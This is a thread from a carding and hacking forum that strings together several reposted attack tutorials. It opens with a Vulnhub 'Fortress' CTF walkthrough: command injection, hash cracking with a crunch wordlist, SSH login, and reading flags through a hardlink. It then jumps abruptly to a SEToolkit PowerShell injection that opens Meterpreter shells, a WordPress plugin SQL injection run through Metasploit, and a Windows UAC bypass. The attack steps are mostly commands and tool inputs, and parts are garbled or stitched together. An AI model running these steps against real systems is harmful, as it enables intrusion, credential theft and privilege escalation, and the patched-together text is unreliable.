[Guide] How to Hack the Fortress VM (CTF Challenge)

[Guide] How to Hack the Fortress VM (CTF Challenge) - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Hack the Fortress VM (CTF Challenge) (/Thread-Guide-How-to-Hack-the-Fortress-VM-CTF-Challenge)

[Guide] How to Hack the Fortress VM (CTF Challenge) - NINZA - 04-25-2020

today we are going to solve another CTF challenge “FORTRESS” of the vulnhub labs. The level of this challenge is not so tough and its difficulty level is described as medium. Solving this lab will give you a good experience of web penetration testing.
You can download it from here:

[To see content please register here]

Penetrating Methodology

Network Scanning (Nmap, netdiscover)
Abusing HTTP service (Burp-suite)
Generating Dictionary (crunch)
Cracking Hash (john the ripper)
SSH login
Capture the 2nd flag and 3rd flag

Let’s Begin!!
Start with the netdiscover command to identify target IP in the local network, in my network 192.168.1.109 is my target IP, you will get yours.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

Further, let’s enumerate open ports and protocols information of the target’s network with help of nmap following command:
nmap -A 192.168.1.109
1
nmap -A 192.168.1.109
As shown in port 22, 80, 443 are open, let’s penetrate more.
[Image: 2.png?w=687&ssl=1]

So we explore target IP in the web browser and welcomed by the following image.
[Image: 3.png?w=687&ssl=1]

After making lots of efforts I decided to use dirbuster for directory brute-force. Type dirbuster on the terminal and automatically OWASP dirbuster window gets open. Here browse your dictionary from /usr/share/dirbuster/wordlists and choose your appropriate wordlist as I select medium.txt, do not forget to address target URL in the top of the text field as http//192.168.0.109 and finally hit the start button.
[Image: 4.png?w=687&ssl=1]

Luckily!!! I found something which is a scanner.php file.
[Image: 5.png?w=687&ssl=1]

So when I explored scanner.php in the web browser, it put-up the following web page in front of us. So when I trigger the localhost IP we got the result of Nmap scan which you can perceive from below image. I also tried to breach it through some kind of command injection but hard luck! all seems to be wasted here.
[Image: 6.png?w=687&ssl=1]

Then I decide to capture the HTTP request in burp suite and send the intercepted request into the repeater.
[Image: 7.png?w=687&ssl=1]

Look over given below image here you will find two panels left and right for request and response respectively.
Type ls as request and click on go tab. This will generate a response to the request you made.
Request: ls
Response: index.html
k1ngd0m_k3yz
logo.png
s1kr3t
scanner.php
styles.css
1
2
3
4
5
6
7
Request: ls
Response: index.html
k1ngd0m_k3yz
logo.png
s1kr3t
scanner.php
styles.css
[Image: 8.png?w=687&ssl=1]

So among 4 directories enumerated above, we ran ls command again to check the list of /s1kr3t and found flag.txt as a response.
Request: ls
Response: flag.txt
[Image: 8_1.png?w=687&ssl=1]

Now repeat the process till the last step of making a request and getting a response through the repeater. With help of cat command, we found the 1st flag.
Request: cat flag.txt
Response: FLAG{n0_one_br3aches_teh_f0rt}
[Image: 8_2.png?w=687&ssl=1]

Then we try to a checklist of k1ngd0m_k3yz and found two files inside it.
Request: ls k1ngd0m_k3yz
Response: master and passwd
[Image: 9.png?w=687&ssl=1]

So I open the master file and found a single entry of /etc/passwd file for user craven along with password hash.
Request: cat k1ngd0m_k3yz/master
Let’s copy the hash password in a text file and named it hash.txt
[Image: 9_1.png?w=687&ssl=1]

Then I open /k1ngd0m_k3yz/passwd where I didn’t found any remarkable clue.
[Image: 9_2.png?w=687&ssl=1]

Then I try to open /etc/passwd file and as you can observe, inside burp response, we got the passwd file and I found an entry for two local users: vulnhub & Craven.
[Image: 10.png?w=687&ssl=1]

Then, I try to get into a/home/craven directory in order to view the present list with the following request.
Request: ls /home/craven
Response: I got three files flag.txt, hint.txt, and remainder.txt.
[Image: 11.png?w=687&ssl=1]

First I try to flag.txt but fail to read it, then inside hint.txt we got some hint for the user password.
[Image: 12.png?w=687&ssl=1]

Then I open a reminder.txt file that gave me a list to buy.
[Image: 13.png?w=687&ssl=1]

Then with help of hint.txt and remainder.txt, we have generated a dictionary using crunch. Crunch is a wordlist generator where you can specify a standard character set or a character set you specify.
crunch 10 10 -t %%%qwerty^ > dict.txt
1
crunch 10 10 -t %%%qwerty^ > dict.txt
[Image: 14.png?w=687&ssl=1]

If you remember we have already enumerated hash password for craven from inside k1ngd0m_k3yz/master. Use john the ripper to crack the password with help crunch dictionary generated above.
cd Desktop
john --wordlist=dict.txt hash.txt
1
2
cd Desktop
john --wordlist=dict.txt hash.txt
931qwerty? is the password for craven as you can perceive from the given image.
[Image: 15.png?w=687&ssl=1]

If you remember the result from nmap which shows port 22 is open now try to connect the target through SSH using above credential.
ssh [email protected]
1
ssh [email protected]
Yesss!! We got login successfully, now when I checked the list of current directory, I found flag.txt.
ls
cat flag.txt
1
2
ls
cat flag.txt
Luckily found 2nd FLAG {w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}
[Image: 19.png?w=687&ssl=1]

It was very tough to get the third flag.txt but with help of the following command, we reached to the final flag.
cd /home
ls
cd vulnhub
ls
cat flag.txt
./reader flag.txt
1
2
3
4
5
6
cd /home
ls
cd vulnhub
ls
cat flag.txt
./reader flag.txt
For finding the 3rd flag we applied the symlink process and successfully grabbed the last flag also.
cd /tmp
ln /home/vulnhub/flag.txt raj
cd /home/vulnhub
./reader /tmp/raj
1
2
3
4
cd /tmp
ln /home/vulnhub/flag.txt raj
cd /home/vulnhub
./reader /tmp/raj
Finally, I found 3rd FLAG{its_A_ph0t0_ph1ni5h}
[Image: 20.png?w=687&ssl=1]

Target: Window Server
Attacker machine: Kali Linux
In this article I am going to make PowerShell injection attack though SEToolkit; for this attack, it is necessary that SMB service must be running and you should aware of username and password of your target pc to get the Meterpreter session.
Let’s Begin The Game!!!
Scan the victim IP from NMAP by typing following command on the terminal in Kali Linux
nmap –sV 192.168.1.104
1
nmap –sV 192.168.1.104
Under version scan, it shows port 445 is open and if you are not aware from port protocol services then let me tell you that port 445 is used for SMB protocol for making communication between two different operating systems like as we have Linux and windows.
[Image: 0.png?w=687]

Now Click Applications > Exploitation Tools > Social Engineering Toolkit > setoolkit.
A new terminal gets open for the setoolkit framework and now you have to follow these steps for making an attack on the target.
From the screenshot, you can perceive that it through a menu to select the following approach for the attack.
Choose penetration testing (fast-track) and type2 for this method.
[Image: 1.png?w=687]

Fast-Track is an automated penetration suite for penetration testers. So from the next screenshot again we have following option, choose PSEXEC Powershell Injection and type 6 for it.
PSEXEC Powershell Injection Attack: This attack will inject a meterpreter backdoor through PowerShell memory injection. This will avoid Anti-Virus since we will never touch disk or memory. Will require Powershell to be installed on the remote victim machine. You can use either straight passwords or hash values.
[Image: 2.png?w=687]

Now give the following information to execute an attack on victim pc.
Enter remote IP as rhost: 192.168.1.104
Enter username: administrator
Enter password: Ignite@1234
If you don’t know the domain name hit enter only for this and same for random select to a number of threads hit enter.
Enter listener IP as lhost: 192.168.1.3
Enter port number: 445
[Image: 3.png?w=687]

Now this will generate a payload for PowerShell injection and start loading Metasploit framework itself. From the below image, you will found that through alphabetic shellcode we have got meterpreter session1 open.
Now type sessions to view active session
[Image: 4.png?w=687]

Further Type sessions –I 1 to get inside meterpreter mode.
Meterpreter> sysinfo
{NOTE: This attack is depending upon the version of SMB PROTOCOL; if the version is updated of 2.1 then maybe this attack is not successful. Use aggressive scanning method for version detail.}
[Image: 5.png?w=687]

WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy.”
WordPress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter ‘size’. The issue is exploitable even if the plugin is deactivated.
The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users’ password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the WordPress installation. Collected information may also allow further attacks.

[To see content please register here]

Attacker: kali Linux
Target: wordpress
Let start!!!!
Start WPSCAN in kali from following step:
Now scan the target IP for scanning any wordpress application and type following command
Through this command we are scanning current plugin installed for any wordpress website.
./wpscan.rb –url

[To see content please register here]

–enumerate p
[Image: 1.png?w=687&ssl=1]

The red sign indicating wp symposium 15.5.1 is vulnerable and suffers from an unauthenticated SQL Injection although blue sign shows version 15.8 if fixed which is not vulnerable till now.
[Image: 2.png?w=687&ssl=1]

Now start metasploit for attack and type msfconsole on terminal in kali Linux.
msf > use auxiliary/admin/http/wp_symposium_sql_injection
msf auxiliary(wp_symposium_sql_injection) >set rhost 192.1681.0.104
msf auxiliary(wp_symposium_sql_injection) >set rport 80
msf auxiliary(wp_symposium_sql_injection) >exploit
Nice!!! Here we found the relevant username and password as user: raj respectively.
[Image: 3.png?w=687&ssl=1]

First of all, to learn to how to hack victim’s PC click

[To see content please register here]

. After hacking when you have gained a meterpreter session then type:
getprivs
using this command you will confirm the fact that you have not entered the administrator yet. So now, there is no need to worry.
[Image: 1.png?w=687&ssl=1]

Now use the following exploit
This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess () after starting your payload in a separate process.
[Image: 2.png?w=687&ssl=1]

As the command will make our file execute we will have a session with administrator privileges as shown
[Image: 3.png?w=687&ssl=1]